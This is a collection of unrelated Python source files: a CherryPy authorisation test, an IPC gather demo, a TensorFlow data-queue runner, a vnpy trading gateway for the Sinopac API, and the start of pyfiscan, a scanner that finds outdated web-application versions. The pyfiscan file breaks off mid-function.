| source | python |
|---|---|
Simple_t.py
|
# system modules
import cherrypy
from cheroot.test import webtest
from cherrypy import expose
from multiprocessing import Process
# WMCore modules
from WMCore.REST.Test import setup_dummy_server, fake_authz_headers
from WMCore.REST.Test import fake_authz_key_file
from WMCore.REST.Tools import tools
FAKE_FILE = fake_authz_key_file()
PORT = 8888
class Root:
def __init__(self, *args):
pass
@expose
def default(self):
return "foo"
@expose
@tools.cms_auth(role = "Global Admin", group = "global")
def global_admin(self):
return "ok"
class SimpleTest(webtest.WebCase):
def setUp(self):
self.h = fake_authz_headers(FAKE_FILE.data)
self.hglobal = fake_authz_headers(FAKE_FILE.data, roles = {"Global Admin": {'group': ['global']}})
webtest.WebCase.PORT = PORT
self.engine = cherrypy.engine
self.proc = load_server(self.engine)
def tearDown(self):
stop_server(self.proc, self.engine)
def test_basic_fail(self):
self.getPage("/test")
self.assertStatus("403 Forbidden")
def test_basic_success(self):
self.getPage("/test", headers = self.h)
self.assertStatus("200 OK")
self.assertBody("foo")
def test_auth_fail(self):
self.getPage("/test/global_admin", headers = self.h)
self.assertStatus("403 Forbidden")
def test_auth_success(self):
self.getPage("/test/global_admin", headers = self.hglobal)
self.assertStatus("200 OK")
self.assertBody("ok")
def setup_server():
srcfile = __file__.split("/")[-1].split(".py")[0]
setup_dummy_server(srcfile, "Root", authz_key_file=FAKE_FILE, port=PORT)
def load_server(engine):
setup_server()
proc = Process(target=start_server, name="cherrypy_Api_t", args=(engine,))
proc.start()
proc.join(timeout=1)
return proc
def start_server(engine):
webtest.WebCase.PORT = PORT
cherrypy.log.screen = True
engine.start()
engine.block()
def stop_server(proc, engine):
cherrypy.log.screen = True
engine.stop()
proc.terminate()
if __name__ == '__main__':
webtest.main()
|
gather.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : gather.py
# Author : Jiayuan Mao
# Email : [email protected]
# Date : 02/16/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
import time
import multiprocessing as mp
from jacinle.comm.gather import make_gather_pair
from jacinle.utils.meta import map_exec_method
def mainloop_pull(pipe):
with pipe.activate():
while True:
msg = pipe.recv()
print('Received: worker_id=#{}, msg={}.'.format(msg['worker_id'], msg))
def mainloop_push(worker_id, pipe):
print('Initialized: worker_id=#{}.'.format(worker_id))
with pipe.activate():
while True:
msg = dict(text='Hello world!', time=time.strftime('%H:%M:%S'), worker_id=worker_id)
pipe.send(msg)
print('Sent: msg={}.'.format(msg))
time.sleep(1)
def main():
pull, pushs = make_gather_pair('jaincle-test', nr_workers=4, mode='ipc')
push_procs = [mp.Process(target=mainloop_push, args=(i, p)) for i, p in enumerate(pushs)]
map_exec_method('start', push_procs)
mainloop_pull(pull)
if __name__ == '__main__':
main()
|
queue_runner.py
|
import tensorflow as tf
import numpy as np
import time
import multiprocessing as mp
import threading
import Queue
class CustomRunner(object):
"""
This class manages the background threads needed to keep a queue filled
with data.
# Need to call the following code block after initializing everything
self.sess.run(tf.global_variables_initializer())
if self.use_tf_threading:
self.coord = tf.train.Coordinator()
self.net.train_runner.start_p_threads(self.sess)
tf.train.start_queue_runners(sess=self.sess, coord=self.coord)
"""
def __init__(self, arg_less_fn, override_dtypes=None,
n_threads=1, n_processes=3, max_size=30):
# arg_less_fn should be a function that takes no arguments and returns
# ready-to-use data in the form of numpy arrays. The shape of its output
# is used to shape the output tensors, so it must be callable at init time.
# override_dtypes overrides the dtypes, which default to numpy's encoding.
self.data_fn = arg_less_fn
self.n_threads = n_threads
self.n_processes = n_processes
self.max_size = max_size
self.use_pool = False
# data_fn shouldn't take any argument,
# just directly return the necessary data
# set via the setter fn
data = self.data_fn()
self.inps = []
shapes, dtypes = [], []
for i, d in enumerate(data):
inp = tf.placeholder(dtype=d.dtype, shape=[None] + list(d.shape[1:]))
self.inps.append(inp)
# remove batching index for individual element
shapes.append(d.shape[1:])
dtypes.append(d.dtype)
# The actual queue of data.
self.tf_queue = tf.FIFOQueue(shapes=shapes,
# override_dtypes or default
dtypes=override_dtypes or dtypes,
capacity=2000)
# The symbolic operation to add data to the queue
self.enqueue_op = self.tf_queue.enqueue_many(self.inps)
def get_inputs(self, batch_size):
"""
Returns tensors containing a batch of images and labels.
If tf_queue has been closed, this raises a QueueBase exception, which
kills the main process when a StopIteration is thrown in one of the
data processes.
"""
return self.tf_queue.dequeue_up_to(tf.reduce_min([batch_size, self.tf_queue.size()]))
def thread_main(self, sess, stop_event):
"""
Function run on alternate thread. Basically, keep adding data to the queue.
"""
tt_last_update = time.time() - 501
count = 0
tot_p_end = 0
processes_all_done = False
while not stop_event.isSet():
if tt_last_update + 500 < time.time():
t = time.time()
# 500 seconds since last update
#print("DataQueue Threading Update:")
#print("TIME: " + str(t))
# MP.Queue says it is not thread safe and is not perfectly accurate.
# Just want to make sure there's no leakage and max_size
# is safely hit
#print("APPROX SIZE: %d" % self.queue.qsize())
#print("TOTAL FETCH ITERATIONS: %d" % count)
tt_last_update = t
count += 1
if processes_all_done and self.queue.empty():
break
try:
data = self.queue.get(timeout=5)
except Queue.Empty:
continue
if type(data) == type(StopIteration()):
tot_p_end += 1
if tot_p_end == self.n_processes:
# Kill any processes
# may need a lock here if multithreading
processes_all_done = True
#print("ALL PROCESSES DONE")
continue
fd = {}
for i, d in enumerate(data):
fd[self.inps[i]] = d
sess.run(self.enqueue_op, feed_dict=fd)
self.queue.close()
def process_main(self, queue):
# Scramble seed so it's not a copy of the parent's seed
np.random.seed()
# np.random.seed(1)
try:
while True:
queue.put(self.data_fn())
except StopIteration as e:
# Should only manually throw when want to close queue
queue.put(e)
#raise e
return
except Exception as e:
queue.put(StopIteration())
#raise e
return
def set_data_fn(self, fn):
self.data_fn = fn
def start_p_threads(self, sess):
""" Start background threads to feed queue """
self.processes = []
self.queue = mp.Queue(self.max_size)
for n in range(self.n_processes):
p = mp.Process(target=self.process_main, args=(self.queue,))
p.daemon = True # thread will close when parent quits
p.start()
self.processes.append(p)
self.threads = []
self.thread_event_killer = []
for n in range(self.n_threads):
kill_thread = threading.Event()
self.thread_event_killer.append(kill_thread)
t = threading.Thread(target=self.thread_main, args=(sess, kill_thread))
t.daemon = True # thread will close when parent quits
t.start()
self.threads.append(t)
return self.processes + self.threads
def kill_programs(self):
# Release objects here if need to
# threads should die in at least 5 seconds because
# nothing blocks for more than 5 seconds
# Sig term, kill first so no more data
[p.terminate() for p in self.processes]
[p.join() for p in self.processes]
# kill second after purging
[e.set() for e in self.thread_event_killer]
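# --- Hedged usage sketch (illustrative, not part of the original class) ---
# Shows the start-up sequence from the class docstring with a dummy data_fn.
# Shapes, sizes and names below are made up; this assumes TF1-style sessions,
# fork-based multiprocessing, and reuses the module-level tf/np imports.
def _example_data_fn():
    # Return a tuple of numpy arrays; the first axis is the batch dimension.
    images = np.random.rand(8, 32, 32, 3).astype(np.float32)
    labels = np.random.randint(0, 10, size=(8,)).astype(np.int64)
    return images, labels

def _example_usage():
    runner = CustomRunner(_example_data_fn, n_threads=1, n_processes=2, max_size=10)
    images_batch, labels_batch = runner.get_inputs(batch_size=8)
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        coord = tf.train.Coordinator()
        runner.start_p_threads(sess)
        tf.train.start_queue_runners(sess=sess, coord=coord)
        # Pull one batch off the TF queue, then shut the pipeline down.
        imgs, lbls = sess.run([images_batch, labels_batch])
        print(imgs.shape, lbls.shape)
        runner.kill_programs()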
|
sinopac_gateway.py
|
# encoding: UTF-8
import os
import sys
from copy import copy
from datetime import datetime
from threading import Thread
from time import sleep
import shioaji as sj
from shioaji.order import Status as SinopacStatus
from shioaji import constant
from shioaji.account import StockAccount, FutureAccount
from vnpy.trader.constant import (
Direction,
Exchange,
Product,
OptionType,
Status,
OrderType,
Offset
)
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest
)
EXCHANGE_VT2SINOPAC = {
Exchange.TSE: "TSE",
Exchange.TFE: "TFE",
Exchange.TFE: "TAIFEX"
}
EXCHANGE_SINOPAC2VT = {v: k for k, v in EXCHANGE_VT2SINOPAC.items()}
STATUS_SINOPAC2VT = {
SinopacStatus.Cancelled: Status.CANCELLED,
SinopacStatus.Failed: Status.REJECTED,
SinopacStatus.Filled: Status.ALLTRADED,
SinopacStatus.Filling: Status.PARTTRADED,
SinopacStatus.PreSubmitted: Status.SUBMITTING,
SinopacStatus.Submitted: Status.NOTTRADED,
SinopacStatus.PendingSubmit: Status.SUBMITTING,
SinopacStatus.Inactive: Status.SUBMITTING,
}
class SinopacGateway(BaseGateway):
"""
VN Trader Gateway for Sinopac connection
"""
default_setting = {
"身份證字號": "",
"密碼": "",
"憑證檔案路徑": "",
"憑證密碼": "",
"環境": ["正式", "模擬"],
"預設現貨帳號": "0",
"預設期貨帳號": "0"
}
exchanges = list(EXCHANGE_SINOPAC2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super(SinopacGateway, self).__init__(event_engine, "Sinopac")
self.subscribed = set()
self.userid = ""
self.password = ""
self.ticks = {}
self.code2contract = {}
self.trades = set()
self.count = 0
self.interval = 20
self.thread = Thread(target=self.query_data)
self.query_funcs = [self.query_position, self.query_trade]
self.api = sj.Shioaji()
def activate_ca(self, ca_path, ca_password, ca_id):
self.api.activate_ca(
ca_path=ca_path, ca_passwd=ca_password, person_id=ca_id)
def query_trade(self):
self.api.update_status()
trades = self.api.list_trades()
for item in trades:
if item.status in [SinopacStatus.Filling, SinopacStatus.Filled]:  # traded
tradeid = item.status.order_id
if tradeid in self.trades:
continue
self.trades.add(tradeid)
trade = TradeData(
symbol=f'{item.contract.code} {item.contract.name}',
exchange=EXCHANGE_SINOPAC2VT.get(
item.contract.exchange, Exchange.TSE),
direction=Direction.LONG if item.order.action == "Buy" else Direction.SHORT,
tradeid=tradeid,
orderid=item.order.seqno,
price=float(item.order.price),
volume=float(item.order.quantity),
time=item.status.order_datetime,
gateway_name=self.gateway_name,
)
self.on_trade(trade)
else:
order = OrderData(
symbol=f'{item.contract.code} {item.contract.name}',
exchange=EXCHANGE_SINOPAC2VT.get(
item.contract.exchange, Exchange.TSE),
orderid=item.order.seqno,
direction=Direction.LONG if item.order.action == "Buy" else Direction.SHORT,
price=float(item.order.price),
volume=float(item.order.quantity),
traded=float(item.status.deal_quantity),
status=STATUS_SINOPAC2VT[item.status.status],
time=item.status.order_datetime,
gateway_name=self.gateway_name,
)
self.on_order(order)
def query_data(self):
"""
Query all data necessary.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_position()
self.query_trade()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def connect(self, setting: dict):
userid = setting['身份證字號']
password = setting['密碼']
try:
self.api.login(userid, password)
except Exception as exc:
self.write_log(f"登入失败. [{exc}]")
return
self.write_log(f"登入成功. [{userid}]")
self.select_default_account(setting.get(
'預設現貨帳號', 0), setting.get('預設期貨帳號', 0))
self.query_contract()
self.write_log("合约查询成功")
self.query_position()
self.write_log("庫存部位查詢")
if setting['憑證檔案路徑'] != "":
self.activate_ca(setting['憑證檔案路徑'],
setting['憑證密碼'], setting['身份證字號'])
self.api.quote.set_callback(self.quote_callback)
self.write_log("交易行情 - 連線成功")
self.thread.start()
def select_default_account(self, select_stock_number, select_futures_number):
stock_account_count = 0
futures_account_count = 0
for acc in self.api.list_accounts():
if isinstance(acc, StockAccount):
self.write_log(
f'股票帳號: [{stock_account_count}] - {acc.broker_id}-{acc.account_id} {acc.username}')
stock_account_count += 1
if isinstance(acc, FutureAccount):
self.write_log(
f'期貨帳號: [{futures_account_count}] - {acc.broker_id}-{acc.account_id} {acc.username}')
futures_account_count += 1
if stock_account_count >= 2:
acc = self.api.list_accounts()[int(select_stock_number)]
self.api.set_default_account(acc)
self.write_log(
f"***預設 現貨下單帳號 - [{select_stock_number}] {acc.broker_id}-{acc.account_id} {acc.username}")
if futures_account_count >= 2:
acc = self.api.list_accounts()[int(select_futures_number)]
self.api.set_default_account(acc)
self.write_log(
f"***預設 期貨下單帳號 - [{select_futures_number}] {acc.broker_id}-{acc.account_id} {acc.username}")
def proc_account(self, data):
pass
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
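# Hedged note: with interval = 20 and vnpy's EVENT_TIMER assumed to fire about
# once per second, query_position and query_trade are rotated so that one of
# them runs roughly every 20 seconds.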
def query_contract(self):
for category in self.api.Contracts.Futures:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TFE,
name=contract.name + contract.delivery_month,
product=Product.FUTURES,
size=200,
pricetick=contract.unit,
net_position=True,
min_volume=1,
gateway_name=self.gateway_name
)
self.on_contract(data)
self.code2contract[contract.code] = contract
for category in self.api.Contracts.Options:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TFE,
name=contract.name + contract.delivery_month,
product=Product.OPTION,
size=50,
net_position=True,
pricetick=contract.unit,
min_volume=1,
gateway_name=self.gateway_name,
option_strike=contract.strike_price,
option_underlying=contract.underlying_code,
option_type=OptionType.CALL if contract.option_right == "C" else OptionType.PUT,
option_expiry=None
)
self.on_contract(data)
self.code2contract[contract.code] = contract
for category in self.api.Contracts.Stocks:
for contract in category:
data = ContractData(
symbol=contract.code,
exchange=Exchange.TSE,
name=contract.name,
product=Product.EQUITY,
size=1,
net_position=False,
pricetick=contract.unit,
min_volume=1,
gateway_name=self.gateway_name
)
self.on_contract(data)
self.code2contract[contract.code] = contract
def subscribe(self, req: SubscribeRequest):
""""""
if req.symbol in self.subscribed:
return
contract = self.code2contract.get(req.symbol, None)
if contract:
self.api.quote.subscribe(contract)
self.api.quote.subscribe(contract, quote_type='bidask')
self.write_log('訂閱 {} {} {}'.format(
req.exchange.value, contract.code, contract.name))
self.subscribed.add(req.symbol)
else:
self.write_log("無此訂閱商品[{}].".format(str(req)))
def send_order(self, req: OrderRequest):
""""""
self.write_log("***send_order")
self.write_log(str(req))
if req.exchange == Exchange.TFE:
action = constant.ACTION_BUY if req.direction == Direction.LONG else constant.ACTION_SELL
price_type = constant.FUTURES_PRICE_TYPE_LMT
order_type = constant.FUTURES_ORDER_TYPE_ROD
order = self.api.Order(req.price, req.volume, action=action,
price_type=price_type,
order_type=order_type)
elif req.exchange == Exchange.TSE:
action = constant.ACTION_BUY if req.direction == Direction.LONG else constant.ACTION_SELL
price_type = constant.STOCK_PRICE_TYPE_LIMITPRICE
order_type = constant.STOCK_ORDER_TYPE_COMMON
first_sell = constant.STOCK_FIRST_SELL_YES if req.offset == Offset.CLOSETODAY else constant.STOCK_FIRST_SELL_NO
order = self.api.Order(price=req.price, quantity=int(req.volume), action=action,
price_type=price_type,
order_type=order_type, first_sell=first_sell)
trade = self.api.place_order(self.code2contract[req.symbol], order)
self.write_log(str(trade))
order = req.create_order_data(order.seqno, self.gateway_name)
self.write_log(str(order))
self.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
self.write_log("***cancel_order")
self.write_log(str(req))
def query_account(self):
""""""
self.write_log("***query_account")
def query_position(self):
""""""
self.api.get_stock_account_unreal_profitloss().update()
data = self.api.get_stock_account_unreal_profitloss().data()["summary"]
for item in data:
pos = PositionData(
symbol=f"{item['stock']} {item['stocknm']}",
exchange=EXCHANGE_SINOPAC2VT.get('TSE', Exchange.TSE),
direction=Direction.LONG if float(
item['real_qty']) >= 0 else Direction.SHORT,
volume=float(item['real_qty']) / 1000,
frozen=float(item['real_qty']) / 1000 -
float(item['qty']) / 1000,
price=float(item['avgprice']),
pnl=float(item['unreal']),
yd_volume=float(item['qty']) / 1000,
gateway_name=self.gateway_name
)
self.on_position(pos)
def close(self):
""""""
def quote_callback(self, topic, data):
"""
# L/TFE/TXFF9
{'Amount': [21088.0], 'AmountSum': [1028165646.0], 'AvgPrice': [10562.513699263414],
'Close': [10544.0], 'Code': 'TXFF9', 'Date': '2019/05/16', 'DiffPrice': [-37.0],
'DiffRate': [-0.34968339476419996], 'DiffType': [4], 'High': [10574.0],
'Low': [10488.0], 'Open': 10537.0, 'TargetKindPrice': 10548.47, 'TickType': [2],
'Time': '11:15:11.911000', 'TradeAskVolSum': 52599, 'TradeBidVolSum': 53721,
'VolSum': [97341], 'Volume': [2]}
# Q/TFE/TXFF9
{'AskPrice': [10545.0, 10546.0, 10547.0, 10548.0, 10549.0], 'AskVolSum': 262,
'AskVolume': [17, 99, 59, 45, 42], 'BidPrice': [10544.0, 10543.0, 10542.0, 10541.0, 10540.0],
'BidVolSum': 289, 'BidVolume': [16, 41, 32, 123, 77], 'Code': 'TXFF9', 'Date': '2019/05/16',
'DiffAskVol': [0, 0, 0, -1, 0], 'DiffAskVolSum': -1, 'DiffBidVol': [0, 0, 0, 0, 0], 'DiffBidVolSum': 0,
'FirstDerivedAskPrice': 10547.0, 'FirstDerivedAskVolume': 1, 'FirstDerivedBidPrice': 10542.0,
'FirstDerivedBidVolume': 1, 'TargetKindPrice': 10548.47, 'Time': '11:15:11.911000'}
# QUT/idcdmzpcr01/TSE/2330
{'AskPrice': [248.0, 248.5, 249.0, 249.5, 250.0], 'AskVolume': [355, 632, 630, 301, 429],
'BidPrice': [247.5, 247.0, 246.5, 246.0, 245.5], 'BidVolume': [397, 389, 509, 703, 434],
'Date': '2019/05/17', 'Time': '09:53:00.706928'}
"""
try:
topics = topic.split('/')
realtime_type = topics[0]
tick = None
if realtime_type == "L":
tick = self.quote_futures_L(data)
elif realtime_type == "Q":
tick = self.quote_futures_Q(data)
elif realtime_type == "MKT":
tick = self.quote_stock_MKT(topics[3], data)
elif realtime_type == "QUT":
tick = self.quote_stock_QUT(topics[3], data)
if tick:
tick.open_interest = 0
self.on_tick(copy(tick))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
filename = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
self.write_log('[{}][{}][{}][{}]'.format(
exc_type, filename, exc_tb.tb_lineno, str(e)))
self.write_log(data)
def quote_futures_Q(self, data):
code = data.get('Code', None)
if code is None:
return
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=data['Code'],
exchange=Exchange.TFE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.bid_price_1 = data["BidPrice"][0]
tick.bid_price_2 = data["BidPrice"][1]
tick.bid_price_3 = data["BidPrice"][2]
tick.bid_price_4 = data["BidPrice"][3]
tick.bid_price_5 = data["BidPrice"][4]
tick.ask_price_1 = data["AskPrice"][0]
tick.ask_price_2 = data["AskPrice"][1]
tick.ask_price_3 = data["AskPrice"][2]
tick.ask_price_4 = data["AskPrice"][3]
tick.ask_price_5 = data["AskPrice"][4]
tick.bid_volume_1 = data["BidVolume"][0]
tick.bid_volume_2 = data["BidVolume"][1]
tick.bid_volume_3 = data["BidVolume"][2]
tick.bid_volume_4 = data["BidVolume"][3]
tick.bid_volume_5 = data["BidVolume"][4]
tick.ask_volume_1 = data["AskVolume"][0]
tick.ask_volume_2 = data["AskVolume"][1]
tick.ask_volume_3 = data["AskVolume"][2]
tick.ask_volume_4 = data["AskVolume"][3]
tick.ask_volume_5 = data["AskVolume"][4]
return tick
def quote_futures_L(self, data):
code = data.get('Code', None)
if code is None:
return
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract.get(code, None)
tick = TickData(
symbol=code,
exchange=Exchange.TFE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.datetime = datetime.strptime('{} {}'.format(
data['Date'], data['Time']), "%Y/%m/%d %H:%M:%S.%f")
tick.volume = data["VolSum"][0]
tick.last_price = data["Close"][0]
tick.limit_up = 0
tick.open_interest = 0
tick.limit_down = 0
tick.open_price = data["Open"]
tick.high_price = data["High"][0]
tick.low_price = data["Low"][0]
tick.pre_close = data["Close"][0] - data["DiffPrice"][0]
return tick
def quote_stock_MKT(self, code, data):
"""
QUT/idcdmzpcr01/TSE/2330
{'AskPrice': [248.0, 248.5, 249.0, 249.5, 250.0], 'AskVolume': [355, 632, 630, 301, 429],
'BidPrice': [247.5, 247.0, 246.5, 246.0, 245.5], 'BidVolume': [397, 389, 509, 703, 434],
'Date': '2019/05/17', 'Time': '09:53:00.706928'}
MKT/idcdmzpcr01/TSE/2330
{'Close': [248.0], 'Time': '09:53:00.706928',
'VolSum': [7023], 'Volume': [1]}
"""
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=code,
exchange=Exchange.TSE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
low_price=99999
)
self.ticks[code] = tick
tick.datetime = datetime.combine(datetime.today(),
datetime.strptime('{}'.format(data['Time']), "%H:%M:%S.%f").time())
tick.volume = data["VolSum"][0]
tick.last_price = data["Close"][0]
tick.limit_up = 0
tick.open_interest = 0
tick.limit_down = 0
tick.open_price = data["Close"][0] if tick.open_price == 0 else tick.open_price
tick.high_price = data["Close"][0] if data["Close"][0] > tick.high_price else tick.high_price
tick.low_price = data["Close"][0] if data["Close"][0] < tick.low_price else tick.low_price
tick.pre_close = tick.open_price
return tick
def quote_stock_QUT(self, code, data):
tick = self.ticks.get(code, None)
if tick is None:
contract = self.code2contract[code]
tick = TickData(
symbol=code,
exchange=Exchange.TSE,
name=f"{contract['name']}{contract['delivery_month']}",
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
tick.bid_price_1 = data["BidPrice"][0]
tick.bid_price_2 = data["BidPrice"][1]
tick.bid_price_3 = data["BidPrice"][2]
tick.bid_price_4 = data["BidPrice"][3]
tick.bid_price_5 = data["BidPrice"][4]
tick.ask_price_1 = data["AskPrice"][0]
tick.ask_price_2 = data["AskPrice"][1]
tick.ask_price_3 = data["AskPrice"][2]
tick.ask_price_4 = data["AskPrice"][3]
tick.ask_price_5 = data["AskPrice"][4]
tick.bid_volume_1 = data["BidVolume"][0]
tick.bid_volume_2 = data["BidVolume"][1]
tick.bid_volume_3 = data["BidVolume"][2]
tick.bid_volume_4 = data["BidVolume"][3]
tick.bid_volume_5 = data["BidVolume"][4]
tick.ask_volume_1 = data["AskVolume"][0]
tick.ask_volume_2 = data["AskVolume"][1]
tick.ask_volume_3 = data["AskVolume"][2]
tick.ask_volume_4 = data["AskVolume"][3]
tick.ask_volume_5 = data["AskVolume"][4]
return tick
|
pyfiscan.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Pyfiscan is a free web-application vulnerability and version scanner that can
be used to locate outdated versions of common web applications on Linux
servers. A typical use case is hosting providers keeping an eye on their
users' installations to stay on top of security updates. Fingerprints are easy
to create and modify, since users can write them in YAML syntax.
@author Henri Salo <[email protected]>
@copyright Copyright (c) 2009-2018 Henri Salo
@license BSD
"""
from __future__ import division
import sys
try:
import csv
import logging
import os
import scandir
import time
import traceback
from docopt import docopt
from multiprocessing import Process, Queue, Pool
from multiprocessing.util import log_to_stderr
# internal imports
from database import Database
from detect import yaml_fn_dict
from file_helpers import \
filepaths_in_dir, validate_directory, check_dir_execution_bit, \
postprocess_php5fcgi
from issuereport import IssueReport, get_timestamp
except ImportError, error:
print('Import error: %s' % error)
sys.exit(1)
queue = Queue()
def populate_directory(fargs):
"""
Populates queue for workers. Consumes lots of disk I/O.
"""
directory, checkmodes = fargs
start_time = time.time()
try:
if not validate_directory(directory, checkmodes):
return time.time() - start_time
logging.debug('Populating: %s', directory)
for filename in filepaths_in_dir(directory, checkmodes):
for appname in database.issues:
for loc in database.locations(appname, with_lists=False):
if filename.endswith(loc):
queue.put((filename, loc, appname))
except Exception:
logging.error(traceback.format_exc())
return time.time() - start_time
def populate_file(fargs):
"""
Populates the queue for workers based on a list of filenames from a file.
"""
logging.debug('Entering populate_file')
filelist, checkmodes = fargs
start_time = time.time()
try:
if not os.path.isfile(filelist):
logging.debug('Location %s is not a file.', filelist)
return time.time() - start_time
logging.debug('Parsing filelist inside populate_file: %s', filelist)
with open(filelist) as f:
for file in f:
filename = file.strip()
for appname in database.issues:
for loc in database.locations(appname, with_lists=False):
if filename.endswith(loc):
logging.debug('Found: %s %s %s',filename,loc,appname)
queue.put((filename, loc, appname))
except Exception:
logging.error(traceback.format_exc())
return time.time() - start_time
def populate_userdir(fargs):
predefined_locations = ['www', 'secure-www']
userdir, checkmodes = fargs
locations = []
try:
userdir = os.path.abspath(userdir)
if not validate_directory(userdir, checkmodes):
return locations
public_html_location = userdir + '/public_html'
if validate_directory(public_html_location, checkmodes):
logging.debug('Appending to locations: %s', public_html_location)
locations.append(public_html_location)
sites_location = userdir + '/sites'
if validate_directory(sites_location, checkmodes):
for site in scandir.scandir(sites_location):
site = site.name
sitedir = sites_location + '/' + site
if checkmodes:
if not check_dir_execution_bit(sitedir):
continue
for predefined_directory in predefined_locations:
sites_location_last = sitedir + '/' + predefined_directory
if validate_directory(sites_location_last, checkmodes):
logging.debug('Appending to locations: %s', sites_location_last)
locations.append(sites_location_last)
except Exception:
logging.error(traceback.format_exc())
return locations
class PopulateScanQueue:
def populate(self, directories, checkmodes=False):
""" Populates worker queue for further scanning. Takes list of
directories to be scanned and checkmodes boolean if execution bit should be
taken into account. """
try:
# Use list of directories in loop to check if locations in data dictionary exists.
starttime = time.time()
p = Pool()
dirs = ((d, checkmodes) for d in directories)
p.map(populate_directory, dirs, chunksize=200)
queue.put(None) # All done. Sending kill signal.
p.close()
p.join()
logging.info('Scanning for locations finished. Elapsed time: %.4f', \
time.time() - starttime)
except OSError:
logging.error(traceback.format_exc())
sys.exit(traceback.format_exc())
except Exception:
logging.error(traceback.format_exc())
def populate_filelist(self, filelist, checkmodes=False):
try:
# Loop through and pass the files to the worker function
starttime = time.time()
logging.debug('Entered populate_filelist')
p = Pool()
files = ((f,checkmodes) for f in filelist)
p.map(populate_file, files, chunksize=200)
queue.put(None) # All done. Sending kill signal.
p.close()
p.join()
logging.info('Scanning for locations finished. Elapsed time: %.4f', \
time.time() - starttime)
except OSError:
logging.error(traceback.format_exc())
sys.exit(traceback.format_exc())
except Exception:
logging.error(traceback.format_exc())
def populate_predefined(self, startdir, checkmodes):
if not isinstance(startdir, str):
logging.debug('populate_predefined: value startdir not a string. "%s" with type %s' % (startdir, type(startdir)))
sys.exit('populate_predefined: value startdir not a string. "%s" with type %s' % (startdir, type(startdir)))
try:
logging.debug('Populating predefined directories: %s', startdir)
starttime = time.time()
p = Pool()
dirs = (startdir + '/' + d.name for d in scandir.scandir(startdir))
udirs = p.imap_unordered(populate_userdir, \
((d, checkmodes) for d in dirs), \
chunksize=200)
p.close()
p.join()
locations = [item for sublist in udirs for item in sublist]
logging.info('Total amount of locations: %s, time elapsed: %.4f', \
len(locations), time.time() - starttime)
self.populate(locations, checkmodes)
except Exception:
logging.error(traceback.format_exc())
def is_not_secure(secure_version, file_version, appname=None):
"""Comparison of version numbers.
secure_version: predefined value from YAML-files
file_version: found from file using grep
appname: used to separate different version numbering syntax
True when file_version < secure_version
False when file_version >= secure_version
"""
if secure_version == 'N/A':
return True
try:
if not all(isinstance(x, str) for x in (secure_version, file_version)):
raise TypeError('is_not_secure: input must be str when comparing. secure_version %s, file_version %s' % \
(type(secure_version), type(file_version)))
if appname == 'WikkaWiki':
# Replace -p → .
# Example version number: 1.3.2-p7
secure_version = secure_version.replace('-p', '.')
file_version = file_version.replace('-p', '.')
return map(int, secure_version.split('.')) > map(int, file_version.split('.'))
except Exception:
logging.error(traceback.format_exc())
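# Hedged examples of the comparison rules implemented above (version strings
# are hypothetical):
#   is_not_secure('1.3.2', '1.3.1')                    -> True  (installed < secure)
#   is_not_secure('1.3.2', '1.3.2')                    -> False (installed >= secure)
#   is_not_secure('1.3.2-p7', '1.3.2-p5', 'WikkaWiki') -> True  ('-p' treated as '.')
#   is_not_secure('N/A', '1.0')                        -> True  (no secure version known)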
def handle_results(report, appname, file_version, item_location, application_cve, \
application_secure):
"""Main handler for all results found. Report is instance of IssueReport,
which handles .csv output.
"""
try:
logging.debug('%s with version %s from %s with vulnerability %s. This installation should be updated to at least version %s.', appname, file_version, item_location, application_cve, application_secure)
print('%s Found: %s %s → %s (%s)' % (get_timestamp(), item_location, file_version, application_secure, appname))
report.add(appname, item_location, file_version, application_secure, application_cve)
except Exception:
logging.error(traceback.format_exc())
def check_old_results(csv_file):
"""Handles old CSV result files and detects if applications have been
updated or not.
"""
report = IssueReport()
# Exit in case csv_file is symlink
if os.path.islink(csv_file):
sys.exit('CSV file %s is a symlink. Exiting..' % csv_file)
reader = csv.reader(open(csv_file, 'rb'), delimiter='|', quotechar='|')
database = Database('yamls/', includes=None)
total = 0
notfixed = 0
fixed = 0
for line in reader:
total += 1
appname = line[1]
file_location = line[2]
try:
for issue in database.issues[appname].itervalues():
for location in issue['location']:
# Loads fingerprint function from YAML file and checks for
# version from detected location
fn = yaml_fn_dict[issue['fingerprint']]
item_location = os.path.abspath(file_location + '/' + location)
if not os.path.exists(item_location):
fixed += 1
break
if not os.path.isfile(item_location):
break
print('Checking version from: %s' % (item_location))
file_version = fn(item_location, issue['regexp'])
if not file_version:
break
# item_location is stripped from application location so that
# we get cleaner output and actual installation directory
install_dir = item_location[:item_location.find(location)]
if is_not_secure(issue['secure_version'], file_version, appname):
# Calls result handler (goes to CSV and log)
handle_results(report, appname, file_version, file_location, issue['cve'], issue['secure_version'])
print('NOT FIXED: %s (%s)' % (install_dir, appname))
notfixed += 1
else:
print('FIXED: %s (%s)' % (install_dir, appname))
